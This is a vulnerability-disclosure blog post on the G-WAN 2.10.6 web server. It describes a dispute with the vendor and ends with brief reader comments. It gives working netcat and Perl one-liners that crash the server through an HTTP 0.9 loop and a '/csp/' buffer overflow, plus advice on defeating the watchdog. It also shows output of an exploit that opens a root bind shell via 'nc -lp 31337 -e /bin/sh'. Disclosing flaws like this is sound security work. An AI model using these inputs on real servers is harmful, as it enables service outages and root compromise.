The serious problems
I reported the problems to the G-WAN developer, who began by very kindly thanking me for my effort and asked for the details. After of course sharing all the findings, he returns after an hour claiming he can’t for his life understand what I mean. Since there is no archive of old versions he will now pretend like it never happened. I find this reaction very sad.
The author claims the problems were solved independently a couple of days before being reported. This does not of course change the fact the v2.10.6 version and possibly others were affected, which is something the author continues to refuse to acknowledge.
I would encourage people to keep their current versions in some archive to check the following out if they are interested.
Below is on an updated Arch Linux 3.0.6, 64-bit, using G-WAN v2.10.6 from October 6. Versions available from this afternoon should be patched by the vendor.
Denial of service
The HTTP 0.9 implementation is broken and was just probably never really tested. For example a simple request for a non existent file will result in a never ending loop of HTML bodies.
[root@wolf test]# echo -e "GET /aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\r\n\r\n" | nc localhost 80 | more 404 Not Found</pre> <h1>Not Found</h1> <pre> The requested URL was not found on this server. 404 Not Found </pre> <h1>Not Found</h1> <pre> The requested URL was not found on this server. 404 Not Found </pre> <h1>Not Found</h1> <pre> The requested URL was not found on this server. 404 Not Found [...]
Repeating this and interrupting the loop results in the following
[root@wolf test]# while :; do echo -e "GET /aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\r\n\r\n" | timeout 0.01 nc localhost 80 ; done [...] G-WAN 2.10.6 (pid:3948) [New LWP 3951] Program received signal SIGPIPE, Broken pipe. [Switching to LWP 3951] 0xf7ffd430 in __kernel_vsyscall () (gdb)
Since the daemon is being kept alive by a watchdog, you have to do this three times in a shorter period than three seconds to make the watchdog give up.
Remote exploitable buffer overflow
A clean buffer overflow in the routines for “/csp/” while decoding the URL.
[root@wolf test]# perl -e "print 'GET /csp/','A'x1200,\" HTTP/1.0\r\n\r\n\"" | nc localhost 80 [...] G-WAN 2.10.6 (pid:9167) [New LWP 9169] Program received signal SIGSEGV, Segmentation fault. [Switching to LWP 9169] 0x41414141 in ?? () (gdb) i r eax 0x31 49 ecx 0x81f2298 136258200 edx 0x0 0 ebx 0x41414141 1094795585 esp 0xf7da51f0 0xf7da51f0 ebp 0x41414141 0x41414141 esi 0x41414141 1094795585 edi 0x41414141 1094795585 eip 0x41414141 0x41414141 eflags 0x10202 [ IF RF ] cs 0x23 35 ss 0x2b 43 ds 0x2b 43 es 0x2b 43 fs 0x0 0 gs 0x63 99 (gdb)
This will result in remote root access.
I have written an exploit as proof of concept which does also bypass ASLR by brute forcing the offset.
[root@wolf exploit]# ./gwan-sploit 127.0.0.1 80 (trying 0xf75bffc0) (trying 0xf75fffc0) (trying 0xf75befc0) (trying 0xf75fefc0) (trying 0xf75bdfc0) [... stops after a few minutes] [...] G-WAN 2.10.6 (pid:13456) process 13456 is executing new program: /bin/bash warning: Selected architecture i386:x86-64 is not compatible with reported target architecture i386 Architecture of file not recognized. (gdb) cont Continuing. [...] [root@wolf exploit]# ps auxww [...] root 13456 0.3 0.0 13528 1424 pts/0 S+ 23:20 0:00 //bin/sh -ccc nc -lp 31337 -e /bin//sh;@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@?Q???Q???P?? [...] [root@wolf exploit]# nc localhost 31337 id uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),19(log) ^C [...] //bin/sh: $'@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\304Q\332\367\274Q\332\367\003P\332\367': command not found [Inferior 1 (process 13456) exited with code 0177] [...]
I will wait for some more abuse by the vendor before publishing this into the wild by respect for the G-WAN users.
Hi,
thanks for your good and serious work.
I would feel honored if you can give some attention also to my work.
http://github.com/stefanocasazza/ULib/tree/master
Cheers,
Stefano
Of course. I’ve looked at your Ulib project but never tested it hands on. Seems like very impressive work.
Thanks,
Fredrik